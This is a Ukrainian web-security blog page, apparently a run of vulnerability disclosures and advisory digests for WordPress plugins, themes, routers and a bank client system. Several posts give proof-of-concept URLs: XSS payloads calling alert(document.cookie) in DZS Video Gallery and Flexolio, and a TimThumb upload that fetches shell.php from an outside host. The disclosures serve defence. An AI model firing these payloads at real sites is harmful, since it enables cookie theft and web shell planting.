Websecurity - Веб безпека

У квітні, 24.04.2014, я виявив Content Spoofing та Cross-Site Scripting уразливості в плагіні DZS Video Gallery для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.

Стосовно плагінів для WordPress раніше я писав про уразливості в DZS Video Gallery для WordPress.

Всього є 4 флешки, які уразливі до CS і XSS. Тобто всі флешки в сумі мають 12 уразливостей.

http://site/wp-content/plugins/dzs-videogallery/deploy/preview.swf
http://site/wp-content/plugins/dzs-videogallery/deploy/preview_skin_rouge.swf
http://site/wp-content/plugins/dzs-videogallery/deploy/preview_allchars.swf
http://site/wp-content/plugins/dzs-videogallery/deploy/preview_skin_overlay.swf

Content Spoofing (WASC-12):

http://site/wp-content/plugins/dzs-videogallery/deploy/preview.swf?video=1.flv&thumb=1.jpg

Content Spoofing (WASC-12):

http://site/wp-content/plugins/dzs-videogallery/deploy/preview.swf?video=1.flv&logo=1.jpg&logoLink=http://websecurity.com.ua

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/dzs-videogallery/deploy/preview.swf?video=1.flv&logo=1.jpg&logoLink=javascript:alert(document.cookie)

Вразливі все версії DZS Video Gallery для WordPress.

В даній добірці уразливості в веб додатках:

• WD My Net N600, N750, N900, N900C - Plain Text Disclosure of Admin Credentials (деталі)
• User Identity Spoofing in Bitrix Site Manager (деталі)
• SQL Injection in InstantCMS (деталі)
• Path Traversal in eduTrac (деталі)
• Certain HP LaserJet Pro Printers, Remote Information Disclosure (деталі)

В даній добірці уразливості в веб додатках:

• SurgeFtp Server BufferOverflow Vulnerability (деталі)
• Vulnerabilities in munin (деталі)
• typo3-src security update (деталі)
• XSS and Full Path Disclosure in MijoSearch Joomla Extension (деталі)
• WD My Net N600, N750, N900, N900C - Plain Text Disclosure of Admin Credentials (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP Realty, Persuasion та Recommend to a friend. Для котрих з’явилися експлоіти. WP Realty - це плагін для торгівлі нерухомістю, Persuasion - це тема движка, Recommend to a friend - це плагін для рекомендації друзям.

• WordPress WP Realty Cross Site Scripting (деталі)
• WordPress Persuasion Theme File Download / Deletion (деталі)
• WordPress Recommend Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• HP Application Lifecycle Management Quality Center (ALM), Remote Cross Site Scripting (XSS) (деталі)
• Vulnerability in owncloud (деталі)
• Vulnerabilities in mediawiki (деталі)
• Revive Adserver 3.0.2 fixes SQL injection vulnerability (деталі)
• Squid-3.3.5 DoS PoC (деталі)

У січні, 06.01.2012, я знайшов Information Leakage уразливості в БНК Клієнт-банк - це система інтернет-банкінгу від АКБ “Національний кредит”. Про що найближчим часом повідомлю розробникам системи.

Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на privatbank.ua.

Information Leakage (WASC-13):

При генерації секретного ключа мають місце наступні уразливості:

По замовчуванню створюється файл з іменем ПІБ користувача та розширенням key. Що полегшує пошук ключа при доступі до комп’ютера користувача чи носія даних, де він зберігається.

Прізвище_Ім’я_Побатькові.key

1. Розширення .key (типово для ключів систем клієнт-банк). Можна змінити.
2. В імені файлу ключа вказано ПІБ. Можна змінити.
3. В тексті файлу ключа вказано ПІБ. Не можна змінити.

Це гірше ніж в системах клієнт-банка Аваля та інших систем на основі Ibank від БИФИТ та систем інших банків, з якими мені доводилося стикатися.

В даній добірці уразливості в веб додатках:

• Hard-coded accounts on multiple network cameras (деталі)
• Secure Entry Server - URL Redirection (деталі)
• Jenkins v1.523 Default markup formatter permits offsite-bound forms (деталі)
• Plain Text Password In SonarQube Jenkins Plugin (деталі)
• Vulnerability in Squid (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Spider Video Player, TDO-Mini-Forms та Husker-Portfolio. Для котрих з’явилися експлоіти. Spider Video Player - це відео плеєр, TDO-Mini-Forms - це плагін для створення форм, Husker-Portfolio - це плагін для створення портфоліо.

• WordPress Spider Video Player 2.1 Cross Site Scripting (деталі)
• WordPress TDO-Mini-Forms Shell Upload (деталі)
• WordPress Husker-Portfolio Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

У квітні, 23.04.2014, я виявив Content Spoofing, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Flexolio для WordPress. Вона містить CU3ER і TimThumb.

Content Spoofing (WASC-12):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/1.xml

1.xml:

cu3er-1.xml

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/cu3er/cu3er.swf?xml=http://site2/xss.xml

xss.xml:

cu3er-2.xml

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://

А також Abuse of Functionality і DoS в уразливості в TimThumb та Arbitrary File Upload уразливість, що була оприлюднена через 3,5 місяці після оприлюднення мною попередніх дірок. Вони можливі в старих версіях теми, бо в останніх версіях теми в TimThumb заборонений доступ до зовнішніх сайтів.

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/flexolio/inc/thumb.php?src=http://site.com/shell.php

Full path disclosure (WASC-13):

FPD в php-файлах шаблону (по замовчуванню) або в error_log. В index.php та інших php-файлах.

http://site/wp-content/themes/flexolio/

Уразливі всі версії теми Flexolio.

В даній добірці уразливості в веб додатках:

• Linksys X3000 - Multiple Vulnerabilities (деталі)
• Cisco/Linksys E1200 N300 Reflected XSS (деталі)
• CVE-2013-3568 - Linksys CSRF + Root Command Injection (деталі)
• LiveZilla 5.1.2.0 Multiple Stored XSS in webbased operator client (деталі)
• Leed (Light Feed) - Multiple vulnerabilities (деталі)